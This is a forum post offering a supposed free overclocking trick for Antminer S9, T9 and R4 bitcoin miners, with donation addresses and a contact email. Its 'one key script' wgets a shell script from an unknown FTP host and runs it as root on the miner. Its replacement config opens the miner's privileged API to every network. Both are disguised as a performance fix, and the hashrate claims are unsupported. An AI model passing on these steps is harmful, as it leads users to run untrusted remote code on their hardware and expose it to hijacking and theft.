Bitcoin Forum
May 04, 2024, 04:51:29 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1]
1  Bitcoin / Mining support / How To Overclock Your S9/T9+,T9,R4 To 18TH/s Free. on: June 06, 2018, 02:09:42 AM
How to overclock your miner.
first, you need using SSH login your miner.

Port is 22 ,IP is your miner IP. Username is :Root, Password is :admin(not incloud space)
It using an antminer BMminer Bug. if u enable 'Fix Freq' Switch and set Freq to 1 ,Then your miner will runs at 850Freq,
S9 can be 17 - 18.5 TH/s hashrate.(PS:miner PSU must more than 2300Watt)
T9+ can be 14
5-15.5 TH/s hashrate (needs 2300W)

How to edit?
First,login your miner SSH.then edit /www/pages/cgi-bin/set_miner_conf.cgi
Edit line 96 to 135(Style like this..),and replace to these:

Code:
echo "{"                                                                        >  /config/bmminer.conf
echo "\"pools\" : ["                                                            >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool1url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool1user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool1pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool2url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool2user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool2pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool3url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool3user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool3pw}\""                                            >> /config/bmminer.conf
echo "}"                                                                        >> /config/bmminer.conf
echo "]"                                                                        >> /config/bmminer.conf
echo ","                                                                        >> /config/bmminer.conf
echo "\"api-listen\" : "true","                                                 >> /config/bmminer.conf
echo "\"api-network\" : "true","                                                >> /config/bmminer.conf
echo "\"api-groups\" : \"A:stats:pools:devs:summary:version\","                 >> /config/bmminer.conf
echo "\"api-allow\" : \"A:0/0,W:*\","                                           >> /config/bmminer.conf
if [ "${ant_nobeeper}" = "true" ]; then
        echo "\"bitmain-nobeeper\" : "true","                                   >> /config/bmminer.conf
fi
if [ "${ant_notempoverctrl}" = "true" ]; then
        echo "\"bitmain-notempoverctrl\" : "true","                             >> /config/bmminer.conf
fi

echo "\"bitmain-fan-ctrl\" : "true","                                           >> /config/bmminer.conf
echo "\"bitmain-fan-pwm\" : \"100\","    >> /config/bmminer.conf
echo "\"fixed-freq\" : "true","                            >> /config/bmminer.conf
echo "\"bitmain-freq\" : \"1\","                              >> /config/bmminer.conf
echo "\"bitmain-voltage\" : \"200\","                                >> /config/bmminer.conf
echo "\"multi-version\" : \"1\""                                                >> /config/bmminer.conf
echo "}"                                                                >> /config/bmminer.conf

If you don't likes edit so more.
just using my 1 key Script:

Code:
cd /
wget ftp://html.hashthing.miner.ink:43231/9serial.sh
chmod 777 /9serial.sh
sh 9serial.sh

Edit after, login to your miner web.
save your ""Miner Configuration"" ,and Save&Apply
Enjoy Your HighHashrate!!

If you success, Please donate me some coins.
Donate Me BCH:1P3hYkpcGLrWhnP7SxpHag9mtqmg9FF4Rg (Thanks..)
Donate Me BTC:16TwadK7mBvYYkhhC7HJa3qfxbTUzogyE6 (Thanks.)

If you need Customize Your miner Hashrate or watt, You can send mail to us :nvid@vip.qq.com

We tested S9 13T  --> 17.5T
S9 14T --> 18.5T
T9 --> 16T
T9+ --> 15.5T
R4 (didn't test)
Pages: [1]
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!